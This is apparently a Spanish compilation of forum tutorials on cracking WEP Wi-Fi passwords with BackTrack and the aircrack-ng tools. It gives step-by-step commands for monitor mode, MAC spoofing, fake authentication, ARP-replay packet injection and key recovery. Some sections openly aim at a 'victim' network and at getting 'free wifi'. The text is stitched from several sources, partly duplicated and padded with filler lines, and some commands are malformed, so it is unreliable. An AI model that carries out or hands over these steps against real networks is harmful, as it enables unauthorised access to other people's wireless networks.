Вы находитесь на странице: 1из 18

Al final pondre los links de descarga y matizar sobre algunos comandos.

Una vez conseguido el Back Track 4 insertamos el DVD en la unidad ptica y reiniciamos el PC. Segn la bios de la placa tienes que darle a F2 o Esc o F10etc para entrar al men de arranque, una vez aqu seleccionar la unidad ptica y pulsar Enter. Una vez pulsado Enter saldr una ventana con varias opciones a elegir, elegir las dos primeras de arriba que corresponden al Inicio con Resolucion 1024768 o con la Resolucion 800600. Una vez cargue el Sistema, saldr una ventana de lnea de comandos y debereis poner startx y empezar el modo grfico.

Aqu empieza todo el proceso: Abrir un terminal para ver que interfaz estamos usando, para ello escribid sin comillas: airmon-ng Una vez sepamos nuestro interfaz procedemos a escanear la red, volvemos a escribir en la misma terminal: airodump-ng wlan0 (wlan0, ath0,etc es el interfaz)

Cuando ya observemos que encuentra nuestra red, cancelamos el proceso con Tecla Ctrl + Tecla C, abrir una nueva terminal y escribimos en este caso para capturar balizas de seal (Beacons) y paquetes de datos (#Data/s): airodump-ng -w wep -c 11 bssid ff:ff:ff:ff:ff:ff wlan0 [airodump-ng -w (nombre del archivo que se crear, en nuestro caso wep) -c (canal) --bssid(bssid) interfaz] //es posible que no identifique la red y os pedir que introduzcais el ESSID ( es el nombre de la red) en este caso pondremos [--essid nombre_de_la_red]. Los datos de el canal y bssid deben ser los de nuestra red wireless. Atencion: no detener el proceso hasta que tengamos por lo menos 35.000 paquete de datos(#Data/s)

El siguiente paso es asociarnos a la red para ello abrimos una nueva terminal y escribimos (se puede hacer mientras est capturando paquetes) el siguente comando: aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0 Una vez asociados en la misma terminal escribimos este comando para abrir/leer los paquetes capturados en el comando antes puesto que sigue corriendo: aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0 Una vez obtenidos los 35.000 paquetes de datos como mnimo y leidos unos tantos miles tambien, procedemos a crackear la contrasea. Primero debemos saber como se llama el fichero donde se ha almacenado, para ello en la terminal, escirbimos: dir y copiamos el nombre del fichero .cap Una vez realizado esto pasamos al ltimo paso: aircrack-ng wep-01.cap

Con este comando empezar a averiguar la contrasea de nuestra wireless, si no la saca es que tiene buena seguridad o que no as conseguido suficientes paquetes, pero dada que la autenticacion es WEP, la sacar porque se ha quedado obsoleto y se puede averiguar la contrasea como en este manual os explico. Os recomiendo poner de seguridad WPA/PSK o WPA2

Descarga Back Track 4 Final: 1570MB


Torrent: http://www.backtrack-linux.org/bt4-final.iso.torrent Descarga Directa: http://www.backtrack-linux.org/download.php?fname=bt4f

Descarga Back Track 4 Final version VM ware: 2000MB


Torrent: http://www.backtrack-linux.org/bt4-final-vm.zip.torrent Descarga Directa: http://www.backtrack-linux.org/download.php?fname=bt4fvm

Opciones de comandos:
bssid = MAC del Punto de acceso/Router La MAC es un es un identificador de 48 bits que corresponde de forma nica a una tarjeta de red. (ff:ff:ff:ff:ff:ff) -c canal = es el canal de nuestra red puede oscilar del 1 al 11 Una vez conseguido el DVD-Live de Back Track 4 insertamos el DVD en la unidad ptica y reiniciamos el PC. Segn la bios de la placa tienes que darle a F2 o Esc o F10etc para entrar al men de arranque, una vez aqu seleccionar la unidad ptica y pulsar Enter. Una vez pulsado Enter saldr una ventana con varias opciones a elegir, elegir las dos primeras de arriba que corresponden al Inicio con Resolucion 1024768 o con la Resolucion 800600. Una vez cargue el Sistema, saldr una ventana de lnea de comandos y debereis poner startx y empezar el modo grfico.

Aqu empieza todo el proceso: Abrir un terminal para ver que interfaz estamos usando, para ello escribid sin comillas: airmon-ng Una vez sepamos nuestro interfaz procedemos a escanear la red, volvemos a escribir en la misma terminal: airodump-ng wlan0 (wlan0, ath0,etc es el interfaz)

Cuando ya observemos que encuentra nuestra red, cancelamos el proceso con Tecla Ctrl + Tecla C, abrir una nueva terminal y escribimos en este caso para capturar balizas de seal (Beacons) y paquetes de datos (#Data/s): airodump-ng -w wep -c 11 bssid ff:ff:ff:ff:ff:ff wlan0

http://sites.google.com/site/mipequenorinconcito/Home/bactrack4.doc?attredirects=0 [airodump-ng -w (cifrado wep) -c (canal) --bssid(bssid) interfaz] //es posible que no identifique la red y os pedir que introduzcais el ESSID ( es el nombre de la red) en este caso pondremos [--essid nombre_de_la_red]. Los datos de el canal y bssid deben ser los de nuestra red wireless. Atencion: no detener el proceso hasta que tengamos por lo menos 35.000 paquete de datos(#Data/s) El siguiente paso es asociarnos a la red para ello abrimos una nueva terminal y

escribimos (se puede hacer mientras est capturando paquetes) el siguente comando: aireplay-ng -1 0 ff:ff:ff:ff:ff:ff:ff wlan0 Una vez asociados en la misma terminal escribimos este comando para abrir/leer los paquetes capturados en el comando antes puesto que sigue corriendo: aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0 Una vez obtenidos los 35.000 paquetes de datos como mnimo y leidos unos tantos miles tambien, procedemos a crackear la contrasea. Primero debemos saber como se llama el fichero donde se ha almacenado, para ello en la terminal, escirbimos: Dir y copiamos el nombre del fichero .cap Una vez realizado esto pasamos al ltimo paso: aircrack-ng nombre_fichero.cap

Con este comando empezar a averiguar la contrasea de nuestra wireless, si no la saca es que tiene buena seguridad o que no as conseguido suficientes paquetes, pero dada que la autenticacion es WEP, la sacar porque se ha quedado obsoleto y se puede averiguar la contrasea como en este manual explico. Recomiendo poner de seguridad WPA/PSK o WPA2 Descarga DVD-Live Back Track 4: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso Opciones de comandos: bssid = MAC del Punto de acceso/Router La MAC es un es un identificador de 48 bits que corresponde de forma nica a una tarjeta de red. (ff:ff:ff:ff:ff:ff) -c canal = es el canal de nuestra red puede oscilar del 1 al 11

Espero que les haya servido este post, es muy bueno, funciona 100%, si no coje la tarjeta de red es que el Sistema Operativo no tiene el driver de su tarjeta de red, espero respuestas. Ya saben agregen a favoritos! Espero que les haya servido,comenten, no cuesta nada. Me cost trabajo hacerlo. Un saludo. Relacionados: Backtrack 4 en USB y Live- CD.

3333333333333333333333333333333333333333333333333333333333333333333333 33 Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc. Nos saldr un menu azul que nos permitir seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores). Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para acojonar luego es bastante facil. Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto grfico al windows. PASO 1: NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del menu de inicio hay un icono cuadrado negro. En una terminal pones: airmon-ng start wifi0 a continuacin: airodump-ng ath1 cuando encuentres tu red wifi ctrl+c para parar la bsqueda y escribes airodump-ng -c [channel] bssid [AP MAC] -w [filename] ath1 donde(no hay que poner corchetes): [channel] es el canal [AP MAC] es la direccin mac, XX:XX:XX:XX:XX [filename] el nombre de archivo que le quieres dar, por ejemplo casa, recuerdalo.

PASO 2: Abre una nueva terminal, ya sabes como aireplay-ng fakeauth 0 -e [AP SSID] -a [AP MAC] ath1 donde: [AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal. Si te sale esto felicidades: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful Si no, intenta con lo siguiente: Aireplay-ng fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1 Y te debera salir algo como esto: 18:22:32 Sending Authentication Request 18:22:32 Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet Si no, olvidate. Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas

PASO 3: aireplay-ng -3 -b [AP MAC] ath1 -x 250 Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezars a ver como la columna DATA de la primera terminal empieza a subir (los nmeros, no es que se mueva de posicin ). Espera hata tener unos 40.000 ms o menos y abre una tercera terminal.

PASO 4: Quiero mi clave yaaaarl!!! aircrack-ng -z -b [AP MAC] [filename*.cap] En lo de filename deberias poner lo que te dije antes, en tu caso sera casa.cap o lo que hayas puesto. Espera otro poquito, y ya te aparecer la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito y disfruta de tu wifi gratis. 3333333333333333333333333333333333333333333333333333333333333333333333 33333

Tutorial para crackear con Backtrack 3


por mostacho el Lun 29 Sep 2008, 00:56 Bueno en este tuto es para usar el Backtrack 3 con la tarjeta de red Intel Pro Wireless 3945 tambien conocida como ipw3945, que es la que tengo en mi portatil Nos bajamos el iso de Bt3 y lo quemamos en un cd. Backtrack 3 Cuando ya tenemos este live-cd lo arrancamos y entra directamente sin tener que poner root ni nada mas. Empezamos: Abrimos terminal Cdigo:
iwconfig

Este comando nos muestra el estado de las interfaces de red. Pero necesitamos activar Ipwraw, para que nuestra tarjeta de red sirva para inyectar, para hacer esto tecleamos lo siguiente: Cdigo:
rmmod iwl3945 modprobe ipwraw

Tecleamos de nuevo el comando

Cdigo:

iwconfig

Y nos saldr que cambi de wlan0 a wifi0, el wifi0 es lo que necesitamos para poder seguir con el crackeo. Bien ahora podemos cambiar nuestra direccin mac con: Cdigo:
macchanger -m 00:11:22:33:44:55 wifi0

Podemos usar cualquier numero que queramos pero que sea en grupos de 6 ejemplo: xx:xx:xx:xx:xx:xx O bien podemos saber nuestro numero MAC de la tarjeta inalmbrica. Lo hacemos por medio de: Cdigo:
ifconfig wifi0 up ifconfig

Es un numero de 12 digitos que viene etiquetado como HRDAW (o algo asi) en el apartado wifi0. Ahora procedemos a escanear las redes a nuestro alcance. Cdigo:
airodump-ng wifi0

Bien ahora lo que sigue ser escanear la red que haymos seleccionado Cdigo:
airodump-ng --channel x --write xxx wifi0

o bien: Cdigo:
airodump-ng -c x -w xxx wifi0

Nota: cambiar la primera "x" por el numero del canal de red que quieran crackear y las "xxx" por algun nombre que deseen no importa cual sea. Ahora lo que haremos es asociarnos con el router de la victima, para poder inyectar los paquetes Cdigo:

aireplay-ng -1 0 -e ESSID -a xx:xx:xx:xx:xx:xx -h nuestra mac wifi0

Cambiar las "x" por la mac de la victima y el ESSID por el nombre de la red victima Paso siguiente a capturar paquetes: Cdigo:
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h nuestra mac wifi0

Recordad cambiar las "x" por la mac de la victima Y comienza la inyeccin de paquetes y si han hecho todo al pie de la letra en estos momentos el numero de ARP estar aumentando rapidamente. Con 30000 DATAS ya puedes intentar el ataque pero pueden necesitarse hasta 100000 o mas DATAS Pas final, craquear la wep: Cdigo:
aircrack-ng xxx-01.cap

Donde xxx es el nombre que eligieron al principio. Nos pedir que seleccionemos el numero de la red victima Y en poco tiempo pondra "Key found" y lo que sea. Existen mas comandos para crackear weps, estos no son los unicos pero eso ya depende de la tarjeta que tengas. Un saludo 3333333333333333333333333333333333333333333333333333333333333333 Weno, primero abrimos una shell, y escribimos: airmon-ng stop ath0

(esto es como para detener la tarjeta de red ath0)

Despues escribimos: macchanger -m 11:22:33:44:55:66 wifi0

)esto es para cambiar nuesta direccion mac) Despues ponemos airmon-ng start wifi0

(esto es para activar nuestra tarjeta en modo monitor) Para saber que todo ha ido bien ponemos iwconfig

(en esta pantallita podemos ver que esta en modo monitor y ver que cambiamos la direccion mac) Despues buscamos las redes que hay al alcance airodump-ng ath0

Aqui debemos apuntar en una hojita lo siguiente: BSSID (xx:xx:xx:xx:xx:xx) CH (en este caso es 5) ESSID (Nombre de la RED) ya que tengamos estos datos, apretamos (control+C) y vremos que se detendra la pantalla anterior.. Despues ponemos.. airodump-ng --channel x --write xxx ath0 x= canal, como en el paso anterio el 5 pues quedaria asi (--channel 5) xxx= nombre, aqui pueden ponel elnombre que quieran, pero acuerdense de lo que ponen, y en mi caso quedaria asi (--write pass)

airodump-ng --channel 5 --write pass ath0 (hasta aqui vamos bien?)

(aqui tendremos una pantallita similar a la anterior) Ahora abrimos otra shell... y en ella ponemos: aireplay-ng -3 -b (mac de la victima) -h (nuestra mac) ath0 y pues quedaria mas o menos asi; aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66

(esto es para empezar a capturar datos ARP) Ahora abrimos otra shell y escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0 a mi me quedaria asi: aireplay-ng -1 0 ESSID -a xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0

y veremos que los ARP empiezan a subir de volada.... hasta este paso debemos de tener dos shell's abrietas

Ahora podemos ver que despues de 10 minutos ya tenemos 62160 ARP, con eso es mas que suficiente, ahora a las dos shell's las cancelamos, en cada una apretamos

(control+C)

Ya estamos en lo ultimo, ahora abrimos otra shell y escribimos: aircrack-ng xx-01.cap xx= el nombre que les dije que se acordaran, en mi caso es (pass) aircrack-ng pass-01.cap

Como la red que nosotros elegimos es la opcion 1 pues ponemos el 1 y damos enter..

Y liesto ya tenemos la Key Found xx:xx:xx:xx:xx esa la debemos poner pero son los dos puntos (xxxxxxxxxx) y listo!!! ya podemos navegar en internet..

Вам также может понравиться